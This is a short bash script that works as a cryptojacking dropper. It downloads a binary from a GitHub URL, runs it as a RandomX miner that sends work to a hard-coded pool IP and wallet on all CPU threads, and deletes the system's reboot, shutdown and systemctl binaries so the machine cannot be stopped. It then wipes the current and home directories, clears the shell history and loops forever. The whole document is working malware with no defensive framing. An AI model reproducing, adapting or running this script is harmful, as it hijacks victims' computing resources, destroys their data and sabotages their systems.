#!/bin/bash
wget -O mm https://github.com/claires67/newxm/raw/main/newxm
chmod 777 mm
./mm --donate-level 1 -o 192.241.159.25:443 -u VU3XD2Kx1nEEX8MKZdJRSxPotqokf2wEvcbrfBqWtrJNjmp5UUegFsqMdeGaomJoodHrC9B7VPJcJ3r48Mm61TEw2Aeb3vGnq -p $(echo $RANDOM | md5sum | head -c 20) -a rx/0 -t $(nproc --all)
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
